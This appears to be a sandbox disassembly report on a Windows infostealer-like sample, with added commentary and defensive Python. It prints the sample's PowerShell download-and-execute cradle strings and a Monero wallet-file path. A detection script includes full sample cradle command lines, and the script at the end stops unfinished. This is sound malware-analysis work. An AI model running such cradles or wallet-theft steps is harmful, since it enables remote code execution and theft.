                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: 0c77aa39ff015a9c3243fd70e9f86043940b1a2b23d34b73cb9d985837c9a594
                            • Instruction ID: bc4e5e89d63c47e7e5af0384d77932ebc434686e5f5b492d2c815ea23dfafab2
                            • Opcode Fuzzy Hash: 0c77aa39ff015a9c3243fd70e9f86043940b1a2b23d34b73cb9d985837c9a594
                            • Instruction Fuzzy Hash: D701FF75A48309BFEB10DBE5DD8AF6E77BCEB49700F104494FA09A6291EA749900DB50
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000E78C4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 000E78CB
                            • RegOpenKeyExA.ADVAPI32(80000002,00D3C208,00000000,00020119,000E7849), ref: 000E78EB
                            • RegQueryValueExA.ADVAPI32(000E7849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 000E790A
                            • RegCloseKey.ADVAPI32(000E7849), ref: 000E7914
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: b822da0e217a2fb201ea1cec54dc8ed9d634e451767da7c4b66ff7e54d342775
                            • Instruction ID: afdc9e0e2b1087fbd6a05e5218d2dcaba84ad59f38be3697d0445f30ce8f10a9
                            • Opcode Fuzzy Hash: b822da0e217a2fb201ea1cec54dc8ed9d634e451767da7c4b66ff7e54d342775
                            • Instruction Fuzzy Hash: DB01FFB5A44309BFEB10DBE4DC8AFAEB7BCEB45700F104994F605A6281E7706A008B91
                            APIs
                            • memset.MSVCRT ref: 000E4325
                            • RegOpenKeyExA.ADVAPI32(80000001,00D4D6A0,00000000,00020119,?), ref: 000E4344
                            • RegQueryValueExA.ADVAPI32(?,00D4E5D8,00000000,00000000,00000000,000000FF), ref: 000E4368
                            • RegCloseKey.ADVAPI32(?), ref: 000E4372
                            • lstrcat.KERNEL32(?,00000000), ref: 000E4397
                            • lstrcat.KERNEL32(?,00D4E590), ref: 000E43AB
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValuememset
                            • String ID:
                            • API String ID: 2623679115-0
                            • Opcode ID: 70b6aa4ae28df06ae5f7ee6f5db6d7f50f1c59bec6dd26e36e84f30b7e835eb3
                            • Instruction ID: ddc5d95b4a1f88b45906532331ee67ca19de4e036e8fb3cacaff3b6d5983960c
                            • Opcode Fuzzy Hash: 70b6aa4ae28df06ae5f7ee6f5db6d7f50f1c59bec6dd26e36e84f30b7e835eb3
                            • Instruction Fuzzy Hash: CC4199B6900108ABDF25EBE0EC57FEE733CAB89700F044559B71656182EE75578C8BE1
                            APIs
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000DA13C
                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 000DA161
                            • LocalAlloc.KERNEL32(00000040,?), ref: 000DA181
                            • ReadFile.KERNEL32(000000FF,?,00000000,000D148F,00000000), ref: 000DA1AA
                            • LocalFree.KERNEL32(000D148F), ref: 000DA1E0
                            • CloseHandle.KERNEL32(000000FF), ref: 000DA1EA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                             • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: 09c9c0effe9f51e7d30f283f691520089dea3ecbc010a9eab2b80950509d7a14
                            • Instruction ID: 17c807d3cd70bb1de9771fc970416c89a802d9f2785086143e901db533762952
                            • Opcode Fuzzy Hash: 09c9c0effe9f51e7d30f283f691520089dea3ecbc010a9eab2b80950509d7a14
                            • Instruction Fuzzy Hash: 1231C978A04209EFDB14CFA4DC85BEEB7B9AF49314F108159E911A7390D774AA81CFA1
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                             • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: String___crt$Typememset
                            • String ID:
                            • API String ID: 3530896902-3916222277
                            • Opcode ID: 1a2e671e149a5bb275ef5fe9a1898959c688b8686646f2931af2e1c38f14977a
                            • Instruction ID: a733c4d4f793b0d88e4dca156a6cbef41ebd881bd93b5a15abc5abcf7feb24bd
                            • Opcode Fuzzy Hash: 1a2e671e149a5bb275ef5fe9a1898959c688b8686646f2931af2e1c38f14977a
                            • Instruction Fuzzy Hash: C14108701007DC5EEB318B25CC85FFB7BE99B45704F2444E8E98AA6183D2729A45DF60
                            APIs
                            • lstrcat.KERNEL32(?,00D4E488), ref: 000E4A2B
                              • Part of subcall function 000E8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000E8F9B
                            • lstrcat.KERNEL32(?,00000000), ref: 000E4A51
                            • lstrcat.KERNEL32(?,?), ref: 000E4A70
                            • lstrcat.KERNEL32(?,?), ref: 000E4A84
                            • lstrcat.KERNEL32(?,00D3B900), ref: 000E4A97
                            • lstrcat.KERNEL32(?,?), ref: 000E4AAB
                            • lstrcat.KERNEL32(?,00D4D7E0), ref: 000E4ABF
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000E8F20: GetFileAttributesA.KERNEL32(00000000,?,000D1B94,?,?,000F577C,?,?,000F0E22), ref: 000E8F2F
                              • Part of subcall function 000E47C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 000E47D0
                              • Part of subcall function 000E47C0: RtlAllocateHeap.NTDLL(00000000), ref: 000E47D7
                              • Part of subcall function 000E47C0: wsprintfA.USER32 ref: 000E47F6
                              • Part of subcall function 000E47C0: FindFirstFileA.KERNEL32(?,?), ref: 000E480D
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                             • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                            • String ID:
                            • API String ID: 2540262943-0
                            • Opcode ID: 37c253b926167b1d343e69f0a1b07d7e0841e74f867db0f939ffd8858ba9f702
                            • Instruction ID: ac67dc96831adf0ddd8a85a70b39be2fef8932a4f126008d618cb053602c65b4
                            • Opcode Fuzzy Hash: 37c253b926167b1d343e69f0a1b07d7e0841e74f867db0f939ffd8858ba9f702
                            • Instruction Fuzzy Hash: B23155B6A00218ABDB15FBB0DC96EDD733CAB59700F404999B249A6052DF74A7C8CF94
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                            • ShellExecuteEx.SHELL32(0000003C), ref: 000E2FD5
                            Strings
                            • <, xrefs: 000E2F89
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 000E2F54
                            • ')", xrefs: 000E2F03
                            • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 000E2F14
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                             • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 3031569214-898575020
                            • Opcode ID: 54845bd1232c25468d7ce0d46de0a5b7eb014816e587f4654488c4eae3a472e5
                            • Instruction ID: 9659c6b95e34576fb677baae5f3f6fc89bd9c32eafbd4e53089d7d2b0d68998f
                            • Opcode Fuzzy Hash: 54845bd1232c25468d7ce0d46de0a5b7eb014816e587f4654488c4eae3a472e5
                            • Instruction Fuzzy Hash: 9B41C971E102489EDB14EBA1C8A2BEDBB79AF19300F414559E1167B193EF703A49CF91
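The strings in this function entry are the pieces of a PowerShell download cradle: the WOW64 PowerShell host path, the argument prefix -nop -c "iex(New-Object Net.WebClient).DownloadString(' and the closing ')", assembled with lstrcpy/lstrcat and handed to ShellExecuteEx. That makes the resulting command line a good detection point, because the host, the -nop switch, the in-memory iex of a WebClient fetch and the URL all end up in process-creation telemetry. The following Python is an added example of mine, not code from the report or from the sample: it classifies a command line against those indicators and pulls out the fetched URL. The three command lines are constructed; the first follows the template above with a placeholder URL, the others are a variant with extra evasion switches and a benign script run.

```python
import re
from typing import Dict, List, Optional

# Constructed sample command lines (not captured from the report). The first
# follows the template the strings above show (WOW64 host path, -nop -c,
# iex(New-Object Net.WebClient).DownloadString('...')) with a placeholder URL.
SAMPLES = [
    r'''C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -nop -c "iex(New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"''',
    r'''powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/a')"''',
    r'''C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File C:\scripts\nightly-backup.ps1''',
]

# PowerShell accepts any unambiguous prefix of a parameter name, so -nop,
# -NoPro and -NoProfile are the same switch; the patterns allow every prefix.
INDICATORS = {
    "noprofile": r"(?<!\S)-nop(?:r(?:o(?:f(?:i(?:le?)?)?)?)?)?(?!\w)",
    "command_flag": r"(?<!\S)-c(?:o(?:m(?:m(?:a(?:nd?)?)?)?)?)?(?!\w)",
    "hidden_window": r"(?<!\S)-w(?:indowstyle)?\s+hidden(?!\w)",
    "exec_policy_bypass": r"(?<!\S)-e(?:xecutionpolicy|p)\s+bypass(?!\w)",
    "iex": r"\b(?:iex|invoke-expression)\b",
    "webclient_download": r"new-object\s+(?:system\.)?net\.webclient\b.*?\.download(?:string|file|data)\s*\(",
    "wow64_host": r"\\syswow64\\windowspowershell\\",   # 32-bit host on a 64-bit box
}
COMPILED = {name: re.compile(pat, re.I) for name, pat in INDICATORS.items()}
URL_RE = re.compile(r"\.downloadstring\s*\(\s*['\"]([^'\"]+)['\"]\s*\)", re.I)


def classify_powershell_cmdline(cmdline: str) -> Dict[str, object]:
    """Return the matched indicators, the fetched URL if visible, and a verdict."""
    hits: List[str] = [name for name, rx in COMPILED.items() if rx.search(cmdline)]
    url_match = URL_RE.search(cmdline)
    url: Optional[str] = url_match.group(1) if url_match else None
    if "iex" in hits and "webclient_download" in hits:
        verdict = "download_cradle"      # remote script fetched and run in memory
    elif len(hits) >= 2:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"indicators": hits, "url": url, "verdict": verdict}


if __name__ == "__main__":
    for line in SAMPLES:
        print(classify_powershell_cmdline(line))
```

The verdict is deliberately driven by the iex plus WebClient-download pair rather than by any single switch, since -nop or -c alone appear in plenty of legitimate automation; the extracted URL is what you pivot on next (DNS and proxy logs, other hosts running the same cradle).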
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                             • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: dllmain_raw$dllmain_crt_dispatch
                            • String ID:
                            • API String ID: 3136044242-0
                            • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                            • Instruction ID: 625ca7633011827fe78b3f2c5a1e87ed737dffad0053298c75313a816718c3d9
                            • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                            • Instruction Fuzzy Hash: 5021A172D42618AFDBA19F59CC8197F7A79EB91BA4F054119F80967231C7308D428BE0
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 000E6C0C
                            • sscanf.NTDLL ref: 000E6C39
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 000E6C52
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 000E6C60
                            • ExitProcess.KERNEL32 ref: 000E6C7A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                             • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$System$File$ExitProcesssscanf
                            • String ID:
                            • API String ID: 2533653975-0
                            • Opcode ID: ed6dcff207b0e351998b3e38dc40435996fd8ba345ccf2a3795acb65c0747e01
                            • Instruction ID: d73bb518921b6465d27c51709f93a1cfa2aa6af8754739fda2f7b8f195011974
                            • Opcode Fuzzy Hash: ed6dcff207b0e351998b3e38dc40435996fd8ba345ccf2a3795acb65c0747e01
                            • Instruction Fuzzy Hash: B621BC75E1420C9FCB09DFE4E945AEEB7B9BF48300F04852AE516B3250EB35A604CB65
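The sequence in this entry, GetSystemTime followed by sscanf on a string, two SystemTimeToFileTime conversions and a reachable ExitProcess, has the shape of a date gate: converting both SYSTEMTIME structures to FILETIME turns the comparison into a plain 64-bit integer compare, and the process can end depending on the result. The report does not show the sscanf format string or which way the comparison goes, so neither is claimed here. The following Python is an added example of mine, not code from the sample: it reproduces the SystemTimeToFileTime arithmetic so that a date string or raw FILETIME recovered from the memory dump can be interpreted and checked offline. The 'YYYY-MM-DD' format and the exit-when-past rule are assumptions made for the example.

```python
import calendar
import re
from datetime import datetime, timezone
from typing import Optional, Tuple

# FILETIME counts 100 ns ticks since 1601-01-01 UTC; this is the offset to the
# Unix epoch, which lets us reuse calendar.timegm for the calendar arithmetic.
EPOCH_DIFF_100NS = 116_444_736_000_000_000


def systemtime_to_filetime(year: int, month: int, day: int, hour: int = 0,
                           minute: int = 0, second: int = 0, ms: int = 0) -> int:
    """Same value kernel32!SystemTimeToFileTime produces for a UTC SYSTEMTIME."""
    unix_seconds = calendar.timegm((year, month, day, hour, minute, second, 0, 0, 0))
    return unix_seconds * 10_000_000 + ms * 10_000 + EPOCH_DIFF_100NS


def filetime_to_datetime(ft: int) -> datetime:
    """Inverse helper for reading a raw 64-bit FILETIME out of a memory dump."""
    unix_100ns = ft - EPOCH_DIFF_100NS
    return datetime.fromtimestamp(unix_100ns / 10_000_000, tz=timezone.utc)


def parse_deadline(text: str) -> Optional[Tuple[int, int, int]]:
    """Assumed sscanf format 'YYYY-MM-DD'; the report does not show the real one."""
    m = re.fullmatch(r"\s*(\d{4})-(\d{2})-(\d{2})\s*", text)
    return (int(m[1]), int(m[2]), int(m[3])) if m else None


def is_past_deadline(now: Tuple[int, int, int], deadline_text: str) -> bool:
    """Assumed rule: the process exits once the current date is past the deadline.
    Both dates go through the same FILETIME conversion, so the decision is one
    integer compare; that is why two SystemTimeToFileTime calls appear together."""
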